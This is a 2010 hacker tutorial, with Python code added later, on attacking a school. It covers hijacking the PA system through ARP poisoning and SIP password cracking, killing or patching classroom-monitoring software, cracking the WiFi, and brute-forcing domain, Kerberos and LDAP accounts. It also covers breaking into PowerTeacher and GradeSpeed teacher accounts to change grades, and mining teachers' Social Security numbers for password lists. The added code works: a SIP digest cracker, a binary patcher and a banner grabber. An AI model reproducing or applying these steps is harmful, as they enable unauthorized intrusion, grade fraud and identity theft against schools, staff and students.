Disclaimer: This tutorial is for information purposes only, and I do not endorse any of the activities discussed within this guide. Neither I nor anyone hosting this guide can be held responsible for anything you do after reading this. What you do with your day lies on your shoulders. So keep the subpoenas out of my mailbox, thank ya much.

Section 1: The Introduction
---------------------------

Greets and meets. Well, I started off this year (2010) with an update to one of my tutorials, and with no original article ideas in mind I thought it's as good a time as any to clean this article up a bit and give it a needed update. I got some positive response from the last edition, but the problem is I copy-pasted many of the parts from the first edition release and it really shows when you read through it. Anywho, besides the phreak intro guides, the school theme is one I've used a lot in past tutorials, mostly because I remember being an 8th grade n00b trying to find some information that I could relate to the school network. There was nothing around, and even now most of the school texts circulating are pretty lame. Eventually, as I learned more, it was the network at my high school where I really got my newbie little flippers wet in it all. Err, not to say go pwn your school or anything; after all, this guide is for information purposes only and all that good shit. Still something fun to ponder over. =) Well anyways, blah blah, let's get on with it..

Section 2: Hijacking the PA System
----------------------------------

Well, as in the last edition I'm going to start off this guide with how to hijack the PA system. In the previous edition I discussed trying to social engineer one of the office people into patching you through to the PA extension, and how to hardwire yourself into the PBX to patch yourself through. Oh, take note in case you didn't know: PBX stands for Private Branch eXchange, and is the internal phone network your school uses to tie together all those phones.
Anywho, the problem with that is that the first one would most likely not work (even those desk jockeys are going to wonder why you would really need to be patched through to fix some "crash at the central office"), and the second one is way too risky for too little reward. Thankfully, nowadays most schools have a VoIP PBX running, which actually makes your job a bit easier. I already talked about much of what follows in Phones & Tones: Second Edition, but since you might not be interested in phreaking altogether I'm going to be repeating myself a bit in order to keep all the relevant information here. So anyways, for this I will assume you have a laptop (if you don't, none of this section applies to you), so you will want to download Cain & Abel..

www.oxid.it/cain.html

Now a good thing to note from here is that even though the PA system is tied in with a VoIP PBX, it still functions basically the same as it used to with analog PBXs. Whenever someone needs to call Sally GoCutsHerself into the main office so her parents can pick her up, or needs to announce some morning crap over the intercom, they pick up the phone and dial an extension to access the PA system. From here I will assume you have a softphone downloaded and a decent mic or headset to use. If you don't have a softphone you can download X-Lite below..

www.counterpath.com/x-lite-download.html

Now to get that PA system extension. For this you will need to crack open your laptop and catch an announcement as it's being issued. You can try this during lunch, if your school allows you to just open your laptop up while you're eating, or if not you can just get in your or a friend's car in the parking lot during your lunch break and try it then. Hell, even give yourself a skip day and have all day to fuck around.. well, assuming you can find yourself a spot close enough to the school to get on their WiFi without getting busted for skipping.
I'm going to assume from here that there is both a wireless access point and you have access to it. How to crack the key if it's protected will be linked later, so for right now let's just go on with how to get access to the PA system. Now open up Cain & Abel, and set yourself up an ARP poison route. First go to Configure, select your network card, and click OK. Now go to the Sniffer tab, start the sniffer, click the + sign, and this will bring up the MAC Address Scanner. "All hosts in my subnet" should already be active so just click OK. Then switch to the APR tab at the bottom, click the + sign again, and you'll see a list of hosts on the left side of the window. Highlight all of them, and all the hosts on the right side. Then just click OK, start APR, and you're set.

One caveat before you sit and wait on it: ARP poisoning only lets you see traffic on your own broadcast segment. If the phones sit on a separate voice VLAN, or the access point isolates wireless clients from each other, you will see no SIP at all no matter how long you wait, and the rest of this section is moot.

You can watch all the calls coming over from the SIP tab, so keep an eye on the To and From fields. As soon as an announcement comes on, check to see the call that came through at that same time and you should see the user that placed it, and the username/extension number for the PA extension. It should be somewhat obvious to identify since most schools are going to base most of the usernames on the name of the user, say the first name and last initial, or first initial and last name of the staff/teacher/whatever. The PA system, on the other hand, will have a much different username. Of course this scheme might not apply to your school, but it happens enough to be mentioned. You can also, if you want, just go into the office right before they send an announcement and pay close attention to what extension they hit to get to the PA system, or even look at one of the phones themselves for the extension number (there's usually an extension list by the dial pad, just find a reason to be close enough to scan over it). Alternatively you can just try using this list of common extensions..

www.totse2.net/text-files/strphnext.htm

Now that you have the PA system extension to call, you will need to get access to a user to call it from. What you will first want to do is find the SIP server. What we will be using for this is SiVuS, which has an entire suite of tools for all your VoIP needs..

www.vopsecurity.org

So open SiVuS, go to SIP Component Discovery, in the "Target network" field enter 192.168.1.1-254 (or whatever the network range is), and then just click Scan. Let that play through and you should find the SIP server fairly quickly (UDP port 5060). So go back over to Cain & Abel.
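Before going back to Cain for the cracking step, it helps to see what a captured SIP "hash" actually is and what a dictionary crack does with it. The Python below is an added example written for this edit, not code from the original article or from Cain. It parses a REGISTER request the way you would see it in the sniffer (pulling the extension out of From/To and the Digest fields out of the Authorization header), then recomputes the RFC 2617 digest for each candidate password and stops when one matches the captured response. The PBX name, realm, nonce, extension 2134 and the password in the sample message are all made up for this example, and the sample deliberately uses the weak default the text warns about (password equals extension).

```python
import hashlib
import re

NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"  # invented for the sample
URI = "sip:pbx.example.school"                 # invented for the sample

# Constructed sample: a SIP REGISTER re-sent by a phone after the server's
# 401 challenge. Everything in it is invented for this example; the
# response= value is filled in by build_sample() below.
SAMPLE_TEMPLATE = (
    "REGISTER sip:pbx.example.school SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.57:5060;branch=z9hG4bK776asdhds\r\n"
    "From: <sip:2134@pbx.example.school>;tag=1928301774\r\n"
    "To: <sip:2134@pbx.example.school>\r\n"
    "Call-ID: a84b4c76e66710\r\n"
    "CSeq: 2 REGISTER\r\n"
    'Authorization: Digest username="2134", realm="school", '
    f'nonce="{NONCE}", uri="{URI}", response="RESPONSE", algorithm=MD5\r\n'
    "Content-Length: 0\r\n\r\n"
)


def _md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def sip_digest_response(username, realm, password, method, uri, nonce,
                        qop=None, nc=None, cnonce=None):
    """RFC 2617 digest as SIP uses it: HA1 = MD5(user:realm:pass),
    HA2 = MD5(method:uri), response = MD5(HA1:nonce:HA2). With qop=auth the
    nonce count and client nonce are mixed in as well."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop:
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def build_sample(password="2134"):
    """Fill in the response a phone holding this password would have sent."""
    resp = sip_digest_response("2134", "school", password, "REGISTER", URI, NONCE)
    return SAMPLE_TEMPLATE.replace("RESPONSE", resp)


_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_sip_auth(message):
    """Return the Digest parameters plus method, From and To of a SIP
    request, or None if the request carries no Digest authorization."""
    lines = message.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        if not line:               # blank line ends the headers
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    auth = headers.get("authorization", "")
    if not auth.lower().startswith("digest "):
        return None
    params = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
              for m in _PARAM.finditer(auth[7:])}
    params.update(method=method, sip_from=headers.get("from", ""),
                  sip_to=headers.get("to", ""))
    return params


def extension_of(sip_header):
    """'<sip:2134@pbx>;tag=..' -> '2134': what you read off From/To to tie
    a call to an extension."""
    m = re.search(r"sip:([^@>;]+)@", sip_header)
    return m.group(1) if m else None


def default_candidates(params):
    """The weak defaults the text mentions: the username and the extension."""
    cands = [params["username"]]
    ext = extension_of(params["sip_from"])
    if ext and ext not in cands:
        cands.append(ext)
    return cands


def crack_sip_digest(params, wordlist):
    """Offline dictionary attack: recompute the response for each candidate
    and compare it with the captured one. Nothing is sent to the PBX."""
    for pw in wordlist:
        got = sip_digest_response(params["username"], params["realm"], pw,
                                  params["method"], params["uri"], params["nonce"],
                                  params.get("qop"), params.get("nc"),
                                  params.get("cnonce"))
        if got == params["response"]:
            return pw
    return None


if __name__ == "__main__":
    p = parse_sip_auth(build_sample())
    print("from", extension_of(p["sip_from"]), "to", extension_of(p["sip_to"]))
    print("password:", crack_sip_digest(p, ["password", "1234"] + default_candidates(p)))
```

The point to take from it: the captured response is bound to the server's nonce, so it can't be replayed to log in, but every candidate can be checked offline at MD5 speed with no lockout and no noise on the wire, which is why a password equal to the extension falls in the first few guesses.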
Hopefully at this point you've let it run long enough to have a decent list of users to attempt to crack into. So from the Sniffer tab click over to the Passwords tab at the bottom of the window, and then from the list on the left select SIP. At this point you should see a list of captured SIP digest responses (they aren't plain password hashes; each one is tied to the nonce the server handed out for that one registration, which is why you crack them offline rather than replay them). Just right click on one of them and select the dictionary crack. A good thing to note here is that a popular default password on PBXs is for the pass to be either the same as the username or the extension number, so throwing both into your word list would probably be a good idea. There are some options to use with your word list like reverse, double, numbered, etc., so just select your word list and let it rip. This is a good time to be doing this during a skip day so you can just take your work home with you and run the cracker through all the hashes you grabbed until something clicks (one of the many advantages of passive cracking).

So from here I'll assume you have the IP for the SIP server, a user/pass to use, and the extension for the PA system. So when you're ready to give your announcement over the PA system, open up X-Lite, right click, click on "SIP Account Settings..", click "Add...", fill in the appropriate info, and click OK. Now dial up the extension, and from here it's all you. Scream obscenities, play your favorite song, or whatever. Have fun with it.

Section 3: Bypassing Classroom Management Software
--------------------------------------------------

Part 1: Intro

You should be plenty familiar with this software. It controls what programs you open, what sites you visit, and at random moments lets the teacher monitor all your computering. So yeah, fuck that, it's got to go. Let's continue..

Part 2: LanSchool

This is one of the most popular classroom management programs used, and it's not all that hard to bypass. One of the more direct courses of action you can take is to disable the program directly in order to leverage some freedom.
The problem is of course that the program will restart itself about 15 seconds after it's closed. In order to fix this problem you can create a short Python script to keep the program closed..

    import os
    import time

    # Kill the LanSchool student agent, then do it again after it restarts
    # itself (roughly every 15 seconds). Stop the script with Ctrl+C.
    while True:
        os.system("taskkill /f /im student.exe")
        time.sleep(15)

Just run it through py2exe and take it to school on a USB stick (if py2exe fails just make a batch file that'll do the same thing). Written as a loop it runs until you kill it; a function that calls itself every 15 seconds does the same job until it hits Python's recursion limit and dies with an error. Keep in mind that taskkill /f on a process running under another account, or as a service, needs administrator rights; see Part 6 for that. You can also just run a Linux live CD, mount the hard drive, and delete the programs themselves from the computer.

C:\Program Files\LANSchool\Student.exe
C:\Program Files\LANSchool\StudentPower.exe

This will keep it off until the next time it's reinstalled.

Part 3: Vision6

This is another very popular piece of software that schools use to control activity on their computers. In previous versions of Vision it was as simple as going to C:\Program Files\Master Solution\Vision and running MEUCONF.exe. This file isn't included with Vision6, but you can download it manually below..
www.megaupload.com/?d=EIU4BIIU

If the link there is down by the time you read this you can just google "meuconf.exe" to see if you can find a new link, or find a torrent for an earlier version of Vision, install it on your computer, and extract MEUCONF.EXE from there (credits to doctoroctagonapus23 for the tip and download link). So drop this file to a USB stick, open it up on the computer in class, run the file & select "Run Manually?", and then just close out Vision6 from the task bar. There, you're done.

Part 4: SMART Sync

Another popular piece of classroom control is SMART Sync (formerly known as SynchronEyes). They've definitely improved their software since the older versions as far as security goes, but it's still basically the same crap as before. If you have the permissions you can try to kill the process itself by going to a cmd prompt and punching in..

taskkill /f /im smartsync.exe

Also you can, as always, drop to a Linux live CD, mount the hard drive, and delete the two files below to remove the software from the computer itself..

C:\Program Files\SmartSync Software\Smartsync Pro\Smartsync.exe
C:\Program Files\SmartSync Software\Smartsync Pro\SmSrvc.exe

Part 5: Additional trick

This technique applies to most classroom management programs so I decided to give it a part of its own. Most of these apps use policies to set permissions for applications: what you can access, what you can't (iexplore.exe, cmd.exe, regedit.exe, etc.). I've got to give credit to Darawk from edgeofnowhere.cc for the idea. First select the program you want to open from its program folder and copy it to the desktop. For example iexplore.exe from C:\Program Files\Internet Explorer\, regedit.exe from C:\Windows\, cmd.exe from C:\Windows\System32\, etc. Now change the file extension from exe to txt. Then plug in your USB stick and open up a hex editor. Just google one up, there's plenty to pick from.
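If you would rather script the edit than poke at it in a hex editor, here is the same byte patch in Python. This is an added example for this edit, not Darawk's or the article's own code, and the sample "binary" it runs on is a made-up byte string, not a real Windows executable. The one thing it shows that a quick manual search can miss is that Windows programs store strings like this as UTF-16LE (each letter followed by a zero byte), so a plain ASCII search for Polic can come up empty even though the string is right there. It also returns the file hash before and after, since that hash is what a hash-based Software Restriction Policy rule matches on.

```python
import hashlib

# Constructed stand-in for a Windows binary: an MZ header, padding, a
# registry path stored the way Windows programs store their strings
# (UTF-16LE), and some trailing bytes. Not a real executable.
SAMPLE_BINARY = (
    b"MZ" + b"\x00" * 62
    + "Software\\Policies\\Microsoft\\Windows\\System".encode("utf-16-le")
    + b"\x00\x00" + b"\x90" * 16
)


def find_string(data, needle):
    """Locate needle in data, trying ASCII first and then UTF-16LE.
    Returns (offset, encoding) or None."""
    for enc in ("ascii", "utf-16-le"):
        off = data.find(needle.encode(enc))
        if off != -1:
            return off, enc
    return None


def patch_string(data, needle, replacement):
    """Overwrite the first occurrence of needle with replacement, which must
    be the same length so nothing else in the file shifts. Returns the
    patched bytes plus where and in which encoding the edit landed."""
    if len(replacement) != len(needle):
        raise ValueError("replacement must have the same length as needle")
    hit = find_string(data, needle)
    if hit is None:
        raise ValueError(f"{needle!r} not found in ASCII or UTF-16LE")
    off, enc = hit
    new = replacement.encode(enc)
    return data[:off] + new + data[off + len(new):], off, enc


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def patch_file(src, dst, needle="Policies", replacement="Polixies"):
    """Read src, patch it, write dst; return the before/after hashes so you
    can see that a one-letter change is a different file to a hash rule."""
    with open(src, "rb") as f:
        data = f.read()
    patched, off, enc = patch_string(data, needle, replacement)
    with open(dst, "wb") as f:
        f.write(patched)
    return {"offset": off, "encoding": enc,
            "sha256_before": sha256_hex(data), "sha256_after": sha256_hex(patched)}


if __name__ == "__main__":
    patched, off, enc = patch_string(SAMPLE_BINARY, "Policies", "Polixies")
    print(f"patched at offset {off} ({enc})")
    print("before", sha256_hex(SAMPLE_BINARY))
    print("after ", sha256_hex(patched))
```

Usage against a real file is patch_file("cmd.txt", "cmd2.txt"); keep the replacement the same length as the original, since growing or shrinking a string inside a PE shifts everything after it and the program will not load.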
Now open up the file you just copied to the desktop, and search for the string "Polic". Search for it as Unicode (UTF-16) as well as ASCII, since that is how Windows programs store most of their strings and a plain text search can come up empty. This should bring you to the policies entry. What that string actually is, in programs like cmd.exe and regedit.exe, is part of the registry path the program itself reads on startup to see whether it has been disabled (the DisableCMD value under Software\Policies\Microsoft\Windows\System, and DisableRegistryTools under ...\Windows\CurrentVersion\Policies\System). Just edit one letter out of the name of the policy, save the file, and then change the extension of the file back to exe. Now run it: the lookup lands on a key that doesn't exist, the program finds no policy, and it just starts. Two caveats. The string edit only matters for restrictions the program enforces on itself; against an OS-enforced Software Restriction Policy what helps is that the copy to the desktop changes the path and the byte change alters the hash, which defeats path and hash rules but not a certificate rule, since the modified file's digital signature no longer verifies.

Part 6: Closing

Well that should cover you for that. One thing I should mention is that for killing processes you will probably need higher permissions on the OS. Just take a crack at the Windows pass using ophcrack. School computer passes usually aren't all that complicated..

http://ophcrack.sourceforge.net/download.php

Section 4: Hacking the School Network
-------------------------------------

Well since every network is just a little different I can't give you a word-for-word on this, but I can at least give you some tips on how to get started. So if you don't have it already you will of course need to get NetStumbler..

www.netstumbler.com/downloads/

So just pack up your laptop, head over to your school, and see what comes up and what sort of encryption, if any, the access points use. If they come across encrypted then you can try your hand at cracking it with BackTrack..

www.backtrack-linux.org/downloads/

Burn it to a CD, come back around, and what you will do from here depends on the encryption used. I'll link some tutorials out of laziness..

WEP: http://thewifihack.com/blog/?p=39
WPA2: http://opsec.cotse.net/opsec/?p=1046

So from here one way or another you should have access to the network. So what now? Well from here that's pretty much up to you. A great place to start is doing some basic scans to get an idea of the network. If you for some odd reason don't have it already you can download nmap below..
http://nmap.org/download.html

So open up the Zenmap GUI and select in Profile "Slow comprehensive scan", or if you're the impatient type just set it at "Intense scan plus UDP", and in Target punch in 192.168.1.1-254 or whatever the network range is. Then just click Scan and let it scan through. A great start for shits and giggles is the HTTP servers you come across during your scan. Most will be network devices (many times with the default account still set, admin:admin), but some may be other services used by the staff tied in to the network with a web server. Just punch any you find into your browser and see what they are. Now on to more serious targets. To make any serious progress within the network you need to tackle the Active Directory. For this you will first want to gather some information on the AD for your school's network. A decent tool for this is Winfingerprint, which can be downloaded below..

http://sourceforge.net/projects/winfingerprint/

This scanner can run a wide variety of checks that you would be interested in. For this scan what you will want to do is check all the scan options (minus ping and traceroute), check "SNMP Community Strings", punch in the IP range over on the top left corner of the window, and then click "Scan". Let that scan through, and ideally what you want to pull from this are the users on the network and the hosts to target.

Now that you're done with that it's time to start gathering some passes. Even though SMB cracking is definitely an old tactic it still has its place when exploring LANs. For this I would suggest using smbbf, which is included in the smbat kit..

www.cqure.net/wp/smbat

You should see a list of functions to use so it should be pretty straightforward, however I will mention one thing. Unless you know the host you're targeting is some Win2k host (still remotely possible on some of the legacy systems at the school district building) you should just set -P at 0. Of course you're bound to run into a lockout limit so don't expect to run a long wordlist; a domain lockout policy will lock the account after a handful of failures and leave a trail of failed logons in the security log for whoever reads it. A good thing to do is just write yourself a wordlist of some likely passes on the network and see what ticks. An example would be for the pass to be the same as the hostname, the workgroup, the name of the school, the name of the football team, admin, password, system, etc. If you're successful you can then just net use your way on and see what's being shared. Of course cracking SMB can be lame so let's go over some other services you may want to look into while you're scanning. The first one I have to mention is Kerberos (port 88). This is used a lot on networks and should be one of your first targets when you're exploring the network.
A good choice here is a CLI set known as KerbCrack, which can be downloaded below..

http://ntsecurity.nu/toolbox/kerbcrack/

Though the name is KerbCrack it actually contains two tools, kerbsniff and kerbcrack. Kerbsniff passively captures the Kerberos pre-authentication data of 2k/XP logons as they cross the wire (an encrypted timestamp derived from the password, not the password itself), so you need to be in a position to see that traffic; the ARP poisoning from Section 2 does the job. Of course 2000 isn't all that popular on networks now (thankfully), but there are still plenty of XP hosts you can try this against. You just punch in the output file and let it sniff. The other tool, kerbcrack, runs either a brute force or a dictionary attack against that captured file, offline, so nothing is sent to the domain controller and no lockout policy gets in the way. As always I would suggest just running a dictionary crack, and fill it with some of the common passes (including some of the ones I mentioned before).

Another choice target is LDAP (port 389). This is used for a lot of administrative functions, and is also good for enumerating more information on the network. A good choice for this and many other protocols is Hydra, which can be downloaded at..

http://freeworld.thc.org/thc-hydra/

This is of course natively for *nix, but there is a Cygwin version for those allergic to any OS outside Windows. It's got a lot of options so just run the program to read through all the parameters. If you successfully snag a pass you can use an open source Java LDAP browser known as JXplorer to browse through..

http://jxplorer.org/

There's also FTP (21), SSH (22), telnet (23), SNMP (161), and other ports that you will want to look into when scanning the network. Most of the telnet/SSH servers will probably, as with HTTP, be network devices, but they're worth a check anyway. Hydra can equally take care of any of those other ports so you already have all you need there. Of course outside dictionary cracks and MITM attacks there are also plenty of vulnerabilities related to the software itself that you can use, but vulns come and go so I won't really get into any specifics.
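As a concrete version of the banner grabbing described next, here is a small Python script (an added example for this edit, not code from the original article) that does the HTTP part with a raw socket: it sends a HEAD request and reads back the status line and headers, so the Server: line comes out with no browser in the way, plus a passive grab for services that talk first. To keep it runnable offline it spins up a throwaway HTTP server on localhost to grab from; that test server, the host and the port are stand-ins for whatever your scan turned up. It uses HTTP/1.0 on purpose: with HTTP/1.1 a server is entitled to answer 400 if you forget the Host: header, and Connection: close makes the server hang up so the read ends cleanly.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def http_head(host, port, timeout=3.0):
    """Send a bare HEAD request and return the status line and headers.
    HTTP/1.0 plus Connection: close so any server answers and then hangs up;
    Host: is sent anyway, since virtual-hosted sites need it."""
    request = (f"HEAD / HTTP/1.0\r\nHost: {host}\r\n"
               "Connection: close\r\n\r\n").encode()
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while b"\r\n\r\n" not in data and len(data) < 65536:
            chunk = sock.recv(4096)
            if not chunk:          # server closed the connection
                break
            data += chunk
    head = data.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return {"status": lines[0], "headers": headers}


def grab_banner(host, port, timeout=3.0):
    """For services that talk first (FTP, SSH, SMTP, telnet): connect, say
    nothing, and return the first line the server sends."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        while b"\n" not in data and len(data) < 4096:
            chunk = sock.recv(1024)
            if not chunk:
                break
            data += chunk
    return data.split(b"\n", 1)[0].strip().decode("latin-1", "replace")


class _QuietHandler(BaseHTTPRequestHandler):
    """Stand-in target: Python's own HTTPServer, which names itself in its
    Server: header. Used only so the example runs offline."""
    def do_HEAD(self):
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):
        pass


def start_test_server():
    """Bind a throwaway HTTP server on a free localhost port."""
    server = HTTPServer(("127.0.0.1", 0), _QuietHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    srv = start_test_server()
    result = http_head("127.0.0.1", srv.server_address[1])
    print(result["status"])
    print("Server:", result["headers"].get("server", "(none)"))
    srv.shutdown()
```

Point http_head at a real host and port from your scan and read result["headers"]["server"]; for port 21, 22 or 25 use grab_banner instead, since those servers speak first and a HEAD request would only confuse them.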
If you need more information on a server you come across, telnet into it and see what banner the server spits back. On most ports (FTP, SSH, SMTP, telnet) you should be able to grab a banner upon connect, while with others like HTTP you will need to throw a request at it to get a response. For example with HTTP, upon connecting to the server just type in

HEAD / HTTP/1.0

and hit Enter twice (the blank line is what ends the request), and that should do it. If you send HEAD / HTTP/1.1 instead, you also have to add a Host: line before the blank one, or most servers will answer 400 Bad Request without telling you anything useful. Then just google the name and version and "vulnerability" (i.e. search "powerschool 1.6 vulnerability", minus the quotes), and see what you come up with. Nmap will also do the bulk of the fingerprinting itself (-sV for service versions, -O for the OS), which should give you the chance to look into any vulnerabilities related to the version of the OS that a particular host uses. I couldn't possibly go over every possibility so you'll just have to do your homework there.

Section 5: Changing Your Grades
-------------------------------

Part 1: Intro

So now let's move on to changing your grades. As I did in the last edition I should remind you that your grades are not just on the computer, but also hard copied. So if you were to actually try any of what follows you could very well get busted by the discrepancy between the two.

Part 2: Finding Usernames

This should be the easiest part, but if you are to have any success with this you should gather a list of usernames for your school. By far the most common username scheme for schools to use is the first initial and last name (i.e. Norman Bates becomes NBATES). Of course there are other schemes that your school may use. One thing you can try is to check the school web site for email addresses. You can either snag an email spider (google one) to do the work for you, look through the pages yourself, or google dork it. To do the last option there in the list just search something like "intext:@countyname.k12.stateinitial.us" (minus the quotes) and see if you get lucky. If the email search doesn't bring up any results there are still other options available to you.
Scan over any faculty member's desk for any notes that may have their username (and possibly even password) on it, or just skim over the screen when you see one of them logging in. All you need is one username to figure out the scheme and throw together a user list yourself.
Part 3: Building a Wordlist

Well now that you have the user list, you need to put together a wordlist to go with it. While any word list you can find on the net will do, you should put in your own passes on top of what's included to make sure it tests for some common defaults. With most gradebook options the default is usually set by the admin, but there are some common schemes. This includes password, Password, gradebook, Gradebook, same as username, 1234, 123456, the teacher's birthdate in various forms (two digit birth month/two digit birth year, for example), the first 2 or 3 letters of the teacher's last name or their initials + birthdate, the first 2 or 3 letters of the teacher's last name or initials + the last 4 digits of their SSN, et cetera. Out of this list incorporate into the wordlist what you can. While you may not have any teachers' SSN, you can sometimes gather a list relatively easily while exploring the school's network. Many times schools will leave a list of social security numbers and their corresponding names on one of the servers on the network for accounting purposes. So just pay attention to any of the text files on any servers you manage to get even user access into to see what you can find.

Part 4: PowerTeacher

This is one of the more prominent gradebook wares used. It runs off a PowerSchool web server, which is probably going to be registered within the same domain as your school's website. Just type in http://ps.yourschoolsite/teachers or http://powerschool.yourschoolsite/teachers and if your school uses it one of the two should bring up the form used. From here you have multiple options. You can try to take a crack at one of the users, or try to take a crack at the server. If you want to try a crack at the users just try using Brutus, which can be downloaded below..
www.hoobie.net/brutus/

So open up Brutus and just enter the URL for the PowerTeacher login into the Target field, select "HTTP (Form)" in the Type field, click "Modify sequence", hit "Learn Form Settings" and once the right settings are loaded click OK, enter the user list you filled earlier into "User File", make a pass list for yourself with some common passes including the name of the school, name of the football team, etc. and then load that in the "Pass File", check "Use Proxy", click "Define" and enter a valid proxy, and then just click "Start". Let that play through and if you get lucky you can cop an account to log in with. Keep in mind that every guess against a web form lands in the server's access log, and an account lockout on the gradebook side will stop you cold, so a short, targeted pass list beats a huge one here.

Of course if you don't get anything you can still take a shot at the server itself. A good thing to do first is open up the Zenmap GUI again and scan the host that the server is on. This will get you the banner for the web server itself, and any other services on the host that could be targeted to get what you want. So your first step should always be to look for any public vulns that you may be able to use. Just search for "servername version vulnerability" and if that doesn't work try looking for any other packages they may use on the server. Hell, you can even try entering the version of PowerSchool your school uses into google and see what you find (it's had plenty of vulns here and there). If all that doesn't work you can just scrap trying the HTTP server itself and target some of the other services on the host using Hydra (as explained earlier) or with any public vulns that the service may be exploitable to.

So let's say one way or another you got access to one of the accounts on the PowerTeacher service, what now? Click the Gradebook icon, and from here you should see the Scoresheet tab (it's a spreadsheet). Here you should see the grades for every student in that teacher's classes, which you can edit at will. Yup, only that teacher's classes: there's no way to edit all the grades you wish without having full server access or a district admin account.
Still, any teacher account would be valuable to somebody..

Part 5: GradeSpeed.NET

This one is actually a bit more secure than some other gradebook options used, mostly because unlike PowerSchool and some others, GradeSpeed.NET runs on a separate server (the gradespeed site). Though no site is completely secure, having the gradebook separate from the school network is actually better, since a compromise of the actual network (which isn't very hard to accomplish) is still not free rein to edit any of the grades. For this I will be repeating much of what I described in the previous section. First, to locate the GradeSpeed login for your school you can try some of the URLs below..

gradespeed.yourschoolsite/gs/
gradespeed2.yourschoolsite/gs/
gs.yourschoolsite/gs/
schoolname.gradespeed.net/gs/

So from here you will see different login options for different types of accounts, in the order of Teacher, Substitute, Administrator, and Parent. If you could, it would be great to get an Administrator account, but since you could easily count all the admin accounts on any single school's gradebook page on one hand, it's unlikely you'd do anything besides lock all of them out. So just click Teacher, copy the URL for the login page, and enter it into Brutus the same way I described in the PowerTeacher section (no point in repeating myself). Of course one thing I have to add is that if you followed the previous section on hacking the school network and snagged any LDAP logins, then you may be able to use the same username/pass to get on GradeSpeed.NET. So anyways, once logged in you can simply click over to Grades to see a list of tables for various students and assignments. Should be obvious what to do from here so I'll close it off here.

Part 6: Closing

There are definitely other options, but as you see the techniques are pretty much going to run the same regardless of the type of gradebook software used. JoomlaLMS, Pinnacle Gradebook2, Lynx.NET, TeacherEase, etc.
If the software is tied in with the web server and not just tied in with the domain, then you can try targeting the site itself to gain access to the databases used. I could dedicate an entire section to this topic, but there have been entirely too many guides on testing sites for common vulns as it is, so if you need some information to start here check some of the milw0rm texts..

www.milw0rm.com/papers/
Section 6: The Conclusion
-------------------------

Well that's it for this article. I honestly had been sitting on this article unfinished for a few weeks. Other projects, old SNES games, and other real-life shit distracted me just enough to honestly forget I was even writing this till a couple days ago. If you need any help that isn't something stupid like "help me hack my skool!!" or just need to get in touch with me there are some contact details below. If you send me an email or message and I don't respond to you within a few days or so I'm probably either just busy or just not interested in helping you (meaning you're asking the wrong question).

Murder Mouse
fuck ©opyright, 2010
pla229 [skat] gmail [rot] com
http://houseofhackers.ning.com/profile/MurderMouse
www.informationleak.net
http://resistance.zzl.org/index.html
www.totse2.net
www.gonullyourself.org
Yahoo! ID: murder_mouse
Skype ID: murder-mouse
IRC: irc.2600.net | #infoleak | nick: MurderM